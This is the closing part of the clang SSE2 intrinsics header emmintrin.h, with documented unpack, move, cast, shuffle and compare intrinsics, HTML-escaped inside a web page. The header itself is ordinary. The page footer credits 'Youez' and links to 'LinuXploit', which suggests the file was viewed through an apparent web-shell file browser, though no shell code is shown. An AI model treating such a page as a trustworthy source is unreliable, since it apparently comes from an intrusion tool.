///    Bits [127:64] are written to bits [63:0] of the destination.
/// \param __b
///    A 128-bit vector of [2 x i64]. \n
///    Bits [127:64] are written to bits [127:64] of the destination.
/// \returns A 128-bit vector of [2 x i64] containing the interleaved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_unpackhi_epi64(__m128i __a,
                                                                __m128i __b) {
  return (__m128i)__builtin_shufflevector((__v2di)__a, (__v2di)__b, 1, 2 + 1);
}

/// Unpacks the low-order (index 0-7) values from two 128-bit vectors of
///    [16 x i8] and interleaves them into a 128-bit vector of [16 x i8].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPUNPCKLBW / PUNPCKLBW &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [16 x i8]. \n
///    Bits [7:0] are written to bits [7:0] of the result. \n
///    Bits [15:8] are written to bits [23:16] of the result. \n
///    Bits [23:16] are written to bits [39:32] of the result. \n
///    Bits [31:24] are written to bits [55:48] of the result. \n
///    Bits [39:32] are written to bits [71:64] of the result. \n
///    Bits [47:40] are written to bits [87:80] of the result. \n
///    Bits [55:48] are written to bits [103:96] of the result. \n
///    Bits [63:56] are written to bits [119:112] of the result.
/// \param __b
///    A 128-bit vector of [16 x i8].
///    Bits [7:0] are written to bits [15:8] of the result. \n
///    Bits [15:8] are written to bits [31:24] of the result. \n
///    Bits [23:16] are written to bits [47:40] of the result. \n
///    Bits [31:24] are written to bits [63:56] of the result. \n
///    Bits [39:32] are written to bits [79:72] of the result. \n
///    Bits [47:40] are written to bits [95:88] of the result. \n
///    Bits [55:48] are written to bits [111:104] of the result. \n
///    Bits [63:56] are written to bits [127:120] of the result.
/// \returns A 128-bit vector of [16 x i8] containing the interleaved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_unpacklo_epi8(__m128i __a,
                                                               __m128i __b) {
  return (__m128i)__builtin_shufflevector(
      (__v16qi)__a, (__v16qi)__b, 0, 16 + 0, 1, 16 + 1, 2, 16 + 2, 3, 16 + 3, 4,
      16 + 4, 5, 16 + 5, 6, 16 + 6, 7, 16 + 7);
}

/// Unpacks the low-order (index 0-3) values from each of the two 128-bit
///    vectors of [8 x i16] and interleaves them into a 128-bit vector of
///    [8 x i16].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPUNPCKLWD / PUNPCKLWD &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [8 x i16].
///    Bits [15:0] are written to bits [15:0] of the result. \n
///    Bits [31:16] are written to bits [47:32] of the result. \n
///    Bits [47:32] are written to bits [79:64] of the result. \n
///    Bits [63:48] are written to bits [111:96] of the result.
/// \param __b
///    A 128-bit vector of [8 x i16].
///    Bits [15:0] are written to bits [31:16] of the result. \n
///    Bits [31:16] are written to bits [63:48] of the result. \n
///    Bits [47:32] are written to bits [95:80] of the result. \n
///    Bits [63:48] are written to bits [127:112] of the result.
/// \returns A 128-bit vector of [8 x i16] containing the interleaved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_unpacklo_epi16(__m128i __a,
                                                                __m128i __b) {
  return (__m128i)__builtin_shufflevector((__v8hi)__a, (__v8hi)__b, 0, 8 + 0, 1,
                                          8 + 1, 2, 8 + 2, 3, 8 + 3);
}

/// Unpacks the low-order (index 0,1) values from two 128-bit vectors of
///    [4 x i32] and interleaves them into a 128-bit vector of [4 x i32].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPUNPCKLDQ / PUNPCKLDQ &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [4 x i32]. \n
///    Bits [31:0] are written to bits [31:0] of the destination. \n
///    Bits [63:32] are written to bits [95:64] of the destination.
/// \param __b
///    A 128-bit vector of [4 x i32]. \n
///    Bits [31:0] are written to bits [64:32] of the destination. \n
///    Bits [63:32] are written to bits [127:96] of the destination.
/// \returns A 128-bit vector of [4 x i32] containing the interleaved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_unpacklo_epi32(__m128i __a,
                                                                __m128i __b) {
  return (__m128i)__builtin_shufflevector((__v4si)__a, (__v4si)__b, 0, 4 + 0, 1,
                                          4 + 1);
}

/// Unpacks the low-order 64-bit elements from two 128-bit vectors of
///    [2 x i64] and interleaves them into a 128-bit vector of [2 x i64].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPUNPCKLQDQ / PUNPCKLQDQ &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [2 x i64]. \n
///    Bits [63:0] are written to bits [63:0] of the destination. \n
/// \param __b
///    A 128-bit vector of [2 x i64]. \n
///    Bits [63:0] are written to bits [127:64] of the destination. \n
/// \returns A 128-bit vector of [2 x i64] containing the interleaved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_unpacklo_epi64(__m128i __a,
                                                                __m128i __b) {
  return (__m128i)__builtin_shufflevector((__v2di)__a, (__v2di)__b, 0, 2 + 0);
}

/// Returns the lower 64 bits of a 128-bit integer vector as a 64-bit
///    integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; MOVDQ2Q &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector operand. The lower 64 bits are moved to the
///    destination.
/// \returns A 64-bit integer containing the lower 64 bits of the parameter.
static __inline__ __m64 __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_movepi64_pi64(__m128i __a) {
  return (__m64)__a[0];
}

/// Moves the 64-bit operand to a 128-bit integer vector, zeroing the
///    upper bits.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; MOVD+VMOVQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 64-bit value.
/// \returns A 128-bit integer vector. The lower 64 bits contain the value from
///    the operand. The upper 64 bits are assigned zeros.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_movpi64_epi64(__m64 __a) {
  return __builtin_shufflevector((__v1di)__a, _mm_setzero_si64(), 0, 1);
}

/// Moves the lower 64 bits of a 128-bit integer vector to a 128-bit
///    integer vector, zeroing the upper bits.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVQ / MOVQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector operand. The lower 64 bits are moved to the
///    destination.
/// \returns A 128-bit integer vector. The lower 64 bits contain the value from
///    the operand. The upper 64 bits are assigned zeros.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_move_epi64(__m128i __a) {
  return __builtin_shufflevector((__v2di)__a, _mm_setzero_si128(), 0, 2);
}

/// Unpacks the high-order 64-bit elements from two 128-bit vectors of
///    [2 x double] and interleaves them into a 128-bit vector of [2 x
///    double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUNPCKHPD / UNPCKHPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. \n
///    Bits [127:64] are written to bits [63:0] of the destination.
/// \param __b
///    A 128-bit vector of [2 x double]. \n
///    Bits [127:64] are written to bits [127:64] of the destination.
/// \returns A 128-bit vector of [2 x double] containing the interleaved values.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_unpackhi_pd(__m128d __a, __m128d __b) {
  return __builtin_shufflevector((__v2df)__a, (__v2df)__b, 1, 2 + 1);
}

/// Unpacks the low-order 64-bit elements from two 128-bit vectors
///    of [2 x double] and interleaves them into a 128-bit vector of [2 x
///    double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VUNPCKLPD / UNPCKLPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. \n
///    Bits [63:0] are written to bits [63:0] of the destination.
/// \param __b
///    A 128-bit vector of [2 x double]. \n
///    Bits [63:0] are written to bits [127:64] of the destination.
/// \returns A 128-bit vector of [2 x double] containing the interleaved values.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_unpacklo_pd(__m128d __a, __m128d __b) {
  return __builtin_shufflevector((__v2df)__a, (__v2df)__b, 0, 2 + 0);
}

/// Extracts the sign bits of the double-precision values in the 128-bit
///    vector of [2 x double], zero-extends the value, and writes it to the
///    low-order bits of the destination.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVMSKPD / MOVMSKPD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double] containing the values with sign bits to
///    be extracted.
/// \returns The sign bits from each of the double-precision elements in \a __a,
///    written to bits [1:0]. The remaining bits are assigned values of zero.
static __inline__ int __DEFAULT_FN_ATTRS _mm_movemask_pd(__m128d __a) {
  return __builtin_ia32_movmskpd((__v2df)__a);
}

/// Constructs a 128-bit floating-point vector of [2 x double] from two
///    128-bit vector parameters of [2 x double], using the immediate-value
///     parameter as a specifier.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128d _mm_shuffle_pd(__m128d a, __m128d b, const int i);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; VSHUFPD / SHUFPD &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit vector of [2 x double].
/// \param b
///    A 128-bit vector of [2 x double].
/// \param i
///    An 8-bit immediate value. The least significant two bits specify which
///    elements to copy from \a a and \a b: \n
///    Bit[0] = 0: lower element of \a a copied to lower element of result. \n
///    Bit[0] = 1: upper element of \a a copied to lower element of result. \n
///    Bit[1] = 0: lower element of \a b copied to upper element of result. \n
///    Bit[1] = 1: upper element of \a b copied to upper element of result. \n
///    Note: To generate a mask, you can use the \c _MM_SHUFFLE2 macro.
///    &lt;c&gt;_MM_SHUFFLE2(b1, b0)&lt;/c&gt; can create a 2-bit mask of the form
///    &lt;c&gt;[b1, b0]&lt;/c&gt;.
/// \returns A 128-bit vector of [2 x double] containing the shuffled values.
#define _mm_shuffle_pd(a, b, i)                                                \
  ((__m128d)__builtin_ia32_shufpd((__v2df)(__m128d)(a), (__v2df)(__m128d)(b),  \
                                  (int)(i)))

/// Casts a 128-bit floating-point vector of [2 x double] into a 128-bit
///    floating-point vector of [4 x float].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic has no corresponding instruction.
///
/// \param __a
///    A 128-bit floating-point vector of [2 x double].
/// \returns A 128-bit floating-point vector of [4 x float] containing the same
///    bitwise pattern as the parameter.
static __inline__ __m128 __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_castpd_ps(__m128d __a) {
  return (__m128)__a;
}

/// Casts a 128-bit floating-point vector of [2 x double] into a 128-bit
///    integer vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic has no corresponding instruction.
///
/// \param __a
///    A 128-bit floating-point vector of [2 x double].
/// \returns A 128-bit integer vector containing the same bitwise pattern as the
///    parameter.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_castpd_si128(__m128d __a) {
  return (__m128i)__a;
}

/// Casts a 128-bit floating-point vector of [4 x float] into a 128-bit
///    floating-point vector of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic has no corresponding instruction.
///
/// \param __a
///    A 128-bit floating-point vector of [4 x float].
/// \returns A 128-bit floating-point vector of [2 x double] containing the same
///    bitwise pattern as the parameter.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_castps_pd(__m128 __a) {
  return (__m128d)__a;
}

/// Casts a 128-bit floating-point vector of [4 x float] into a 128-bit
///    integer vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic has no corresponding instruction.
///
/// \param __a
///    A 128-bit floating-point vector of [4 x float].
/// \returns A 128-bit integer vector containing the same bitwise pattern as the
///    parameter.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_castps_si128(__m128 __a) {
  return (__m128i)__a;
}

/// Casts a 128-bit integer vector into a 128-bit floating-point vector
///    of [4 x float].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic has no corresponding instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \returns A 128-bit floating-point vector of [4 x float] containing the same
///    bitwise pattern as the parameter.
static __inline__ __m128 __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_castsi128_ps(__m128i __a) {
  return (__m128)__a;
}

/// Casts a 128-bit integer vector into a 128-bit floating-point vector
///    of [2 x double].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic has no corresponding instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \returns A 128-bit floating-point vector of [2 x double] containing the same
///    bitwise pattern as the parameter.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_castsi128_pd(__m128i __a) {
  return (__m128d)__a;
}

/// Compares each of the corresponding double-precision values of two
///    128-bit vectors of [2 x double], using the operation specified by the
///    immediate integer operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, comparisons that are ordered
///    return false, and comparisons that are unordered return true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128d _mm_cmp_pd(__m128d a, __m128d b, const int c);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; (V)CMPPD &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit vector of [2 x double].
/// \param b
///    A 128-bit vector of [2 x double].
/// \param c
///    An immediate integer operand, with bits [4:0] specifying which comparison
///    operation to use: \n
///    0x00: Equal (ordered, non-signaling) \n
///    0x01: Less-than (ordered, signaling) \n
///    0x02: Less-than-or-equal (ordered, signaling) \n
///    0x03: Unordered (non-signaling) \n
///    0x04: Not-equal (unordered, non-signaling) \n
///    0x05: Not-less-than (unordered, signaling) \n
///    0x06: Not-less-than-or-equal (unordered, signaling) \n
///    0x07: Ordered (non-signaling) \n
/// \returns A 128-bit vector of [2 x double] containing the comparison results.
#define _mm_cmp_pd(a, b, c)                                                    \
  ((__m128d)__builtin_ia32_cmppd((__v2df)(__m128d)(a), (__v2df)(__m128d)(b),   \
                                 (c)))

/// Compares each of the corresponding scalar double-precision values of
///    two 128-bit vectors of [2 x double], using the operation specified by the
///    immediate integer operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFFFFFFFFFF for true.
///    If either value in a comparison is NaN, comparisons that are ordered
///    return false, and comparisons that are unordered return true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128d _mm_cmp_sd(__m128d a, __m128d b, const int c);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; (V)CMPSD &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit vector of [2 x double].
/// \param b
///    A 128-bit vector of [2 x double].
/// \param c
///    An immediate integer operand, with bits [4:0] specifying which comparison
///    operation to use: \n
///    0x00: Equal (ordered, non-signaling) \n
///    0x01: Less-than (ordered, signaling) \n
///    0x02: Less-than-or-equal (ordered, signaling) \n
///    0x03: Unordered (non-signaling) \n
///    0x04: Not-equal (unordered, non-signaling) \n
///    0x05: Not-less-than (unordered, signaling) \n
///    0x06: Not-less-than-or-equal (unordered, signaling) \n
///    0x07: Ordered (non-signaling) \n
/// \returns A 128-bit vector of [2 x double] containing the comparison results.
#define _mm_cmp_sd(a, b, c)                                                    \
  ((__m128d)__builtin_ia32_cmpsd((__v2df)(__m128d)(a), (__v2df)(__m128d)(b),   \
                                 (c)))

#if defined(__cplusplus)
extern &quot;C&quot; {
#endif

/// Indicates that a spin loop is being executed for the purposes of
///    optimizing power consumption during the loop.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; PAUSE &lt;/c&gt; instruction.
///
void _mm_pause(void);

#if defined(__cplusplus)
} // extern &quot;C&quot;
#endif

#undef __anyext128
#undef __trunc64
#undef __DEFAULT_FN_ATTRS
#undef __DEFAULT_FN_ATTRS_CONSTEXPR

#define _MM_SHUFFLE2(x, y) (((x) &lt;&lt; 1) | (y))

#define _MM_DENORMALS_ZERO_ON (0x0040U)
#define _MM_DENORMALS_ZERO_OFF (0x0000U)

#define _MM_DENORMALS_ZERO_MASK (0x0040U)

#define _MM_GET_DENORMALS_ZERO_MODE() (_mm_getcsr() &amp; _MM_DENORMALS_ZERO_MASK)
#define _MM_SET_DENORMALS_ZERO_MODE(x)                                         \
  (_mm_setcsr((_mm_getcsr() &amp; ~_MM_DENORMALS_ZERO_MASK) | (x)))

#endif /* __EMMINTRIN_H */
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>